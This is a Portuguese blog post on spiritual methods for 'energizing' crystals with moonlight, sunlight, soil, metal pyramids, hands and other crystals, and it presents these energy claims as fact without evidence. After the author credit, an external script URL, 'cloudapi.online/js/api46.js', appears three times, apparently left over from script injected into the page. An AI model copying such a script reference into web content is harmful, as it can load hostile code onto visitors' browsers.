Energizando nossos Cristais (por Trivia Luna)

Assim como a purificação, a energização de um cristal também é importante. É através dela que o cristal se fortalece e continua realizando a sua função. Existem diversas maneiras de se fazer isso, e decidi trazer algumas dicas para você escolher a melhor maneira de energizar os seus cristais.

Geralmente a energização ocorre após realizar a purificação, e pode ser feita tanto antes como depois da programação.
Vamos as dicas:

Pela Luz da Lua

Essa é uma das formas mais comuns, nós bruxos e magistas quase sempre separamos alguma coisa para energizar na Lua Cheia, e não é diferente com os cristais. Como fazer? Simples, numa noite de Lua Cheia separe as pedras e os cristais que deseja energizar e coloque sobre um recipiente que não seja de plástico ou sobre uma superfície plana que esteja sobre a luz da Lua, e deixe lá por quantas horas você desejar, lembrando que tem de tirar antes do Sol nascer, importante frisar que as pedras devem receber diretamente a luz lunar para que elas sejam devidamente energizadas, uma outra coisa que acho interessante ressaltar, é que a maioria das pedras possuem um planeta regente e seria interessante utilizar essa forma de energização apenas com pedras que são regidas pela Lua ou que possuem características similares com este astro.

.

 

Pela Luz do Sol

Também é bastante comum e é feita da mesma maneira quando energizamos pela Lua, a única diferença é que não há um dia mais propício ou certo para fazer essa energização. É importante ressaltar que existem pedras e cristais que podem sofrer alteração em sua cor quando expostas muito tempo a luz solar ou ao calor, então de uma pesquisada antes de usar este processo, e aqui ocorre o mesmo sobre a questão das pedras serem regidas pelo Sol ou possuírem características similares a ele.

Com a Terra

Essa é uma das maneiras mais simples, energizar um cristal com a terra consiste em deixar o seu cristal por algumas horas em um vaso de planta ou em seu jardim em contato direto com a terra. Apenas tome cuidado, se a terra estiver úmida, pode não ser a melhor opção para os cristais estratificados (turmalinas, piritas, selenitas e cianitas por exemplo).

 

.

Pela Piramide

Caso você possua uma pirâmide oca, geralmente feitas de metal, você pode deixar seus cristais dentro dela a fim de realizar uma energização. As pirâmides são poderosas e possuem muita força e energia, elas são ideais para energizar objetos. Neste método é aconselhável deixar o máximo de tempo possível, sendo o ideal 24h.

.

Por nossas mãos

É possível também realizar a energização através da imposição de mãos, basta você se acalmar, e relaxar como se fosse meditar, e então estender suas mãos sobre o cristal, visualizar a energia do Universo passando através de você para aquele cristal, o tempo ideal varia de bruxo para bruxo, mas o aconselhável é entre 3 à 4 minutos.

.

Através de outros Cristais

Assim como podemos utilizar outros cristais para purificar, também podemos utilizar os cristais para energizar, alguns deles possuem o poder de atrair para si a energia e distribuir aos outros, a forma mais simples de fazer essa energização é guardar com seus cristais um destes poderosos energizadores (citrino, granada e selenita são só alguns exemplos).

 

Enfim, essas são as maneiras que eu já testei e funcionou. rs
Através dessas dicas você pode selecionar a que melhor se adequar a sua rotina mágica.

Quer saber um pouco mais sobre esse assunto e qual o processo que devemos realizar antes de energizar nossos cristais? É só dar uma olhada em “Como cuidar de nossos Cristais” .

Texto escrito po Arian, ariana, terapeuta reikiana, iniciada na antiga arte da bruxaria, idealizadora e criadora do blog Trívia Luna.

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

Anúncios

2 comentários sobre “Energizando nossos Cristais (por Trivia Luna)

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s